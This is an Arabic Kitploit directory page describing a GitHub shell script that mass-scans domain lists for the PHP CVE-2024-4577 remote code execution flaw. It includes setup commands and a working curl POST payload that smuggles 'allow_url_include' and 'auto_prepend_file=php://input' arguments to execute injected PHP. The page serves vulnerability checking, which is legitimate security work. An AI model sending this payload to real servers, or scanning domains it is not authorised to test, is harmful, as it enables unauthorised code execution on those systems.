Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-4577 — سكربت شل لمسح النطاقات بحثًا عن ثغرة تنفيذ التعليمات البرمجية عن بُعد في PHP CVE-2024-4577 عبر طلبات POST مُصنَّعة، مع تصدير الأهداف الضعيفة للتحقق اليدوي. | Kitploit
أدوات/GitHubGitHub/graphite-org/cve-2024-4577
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubgraphite-org/cve-2024-4577

CVE-2024-4577

سكربت شل لمسح النطاقات بحثًا عن ثغرة تنفيذ التعليمات البرمجية عن بُعد في PHP CVE-2024-4577 عبر طلبات POST مُصنَّعة، مع تصدير الأهداف الضعيفة للتحقق اليدوي.

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مدقق الثغرة CVE-2024-4577

هذا النص البرمجي مصمم للتحقق من الثغرة الموصوفة في CVE-2024-4577، والتي تتضمن استغلال تهيئات PHP معينة لتنفيذ تعليمات برمجية عن بُعد. يقوم بإرسال طلب POST إلى نقاط نهاية محددة على قائمة من النطاقات ويتحقق مما إذا كان الرد يشير إلى وجود الثغرة.

الاستخدام

  1. تثبيت GNU Parallel:

    root@kitploit:~
    sudo apt-get install parallel
    
  2. استنساخ المستودع: استنسخ هذا المستودع إلى جهازك المحلي باستخدام Git:

    root@kitploit:~
    git clone https://github.com/Yukiioz/CVE-2024-4577.git
    
  3. الانتقال إلى المستودع: انتقل إلى الدليل المُستنسخ:

    root@kitploit:~
    cd CVE-2024-4577
    
  4. تحضير قائمة النطاقات: أنشئ ملفاً نصياً يحتوي على قائمة النطاقات المراد فحصها. يجب أن يكون كل نطاق في سطر جديد. على سبيل المثال:

    root@kitploit:~
    https://example1.com
    https://example2.com
    https://example3.com
    
  5. تشغيل النص البرمجي: قم بتشغيل النص البرمجي CVE-2024-4577.sh مع تمرير مسار ملف قائمة النطاقات كوسيط:

    root@kitploit:~
    ./CVE-2024-4577.sh live-subdomains.txt | tee script.log
    
  6. مراجعة المخرجات: سيعرض النص البرمجي معلومات التقدم أثناء فحص كل نطاق. إذا تم العثور على نطاق ضعيف، فسيتم إبرازه باللون الأحمر. كما سيُصدر النص البرمجي قائمة بالنطاقات الضعيفة إلى ملف باسم vulnerable_domains.txt.

الملف المُصدر: vulnerable_domains.txt

يُصدر النص البرمجي قائمة بالنطاقات الضعيفة إلى ملف باسم vulnerable_domains.txt. يحتوي هذا الملف على قائمة بسيطة من النطاقات الضعيفة، كل نطاق في سطر جديد. للتأكيد يدوياً بشكل إضافي، استخدم أمر curl لإرسال طلب POST إلى نقطة النهاية المستهدفة على النطاق. استبدل https://dev.example.com/test.php بنقطة النهاية الفعلية على النطاق المستهدف.

root@kitploit:~
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
     -H "User-Agent: curl/8.3.0" \
     --data "<?php phpinfo(); ?>"
تنزيل الأداة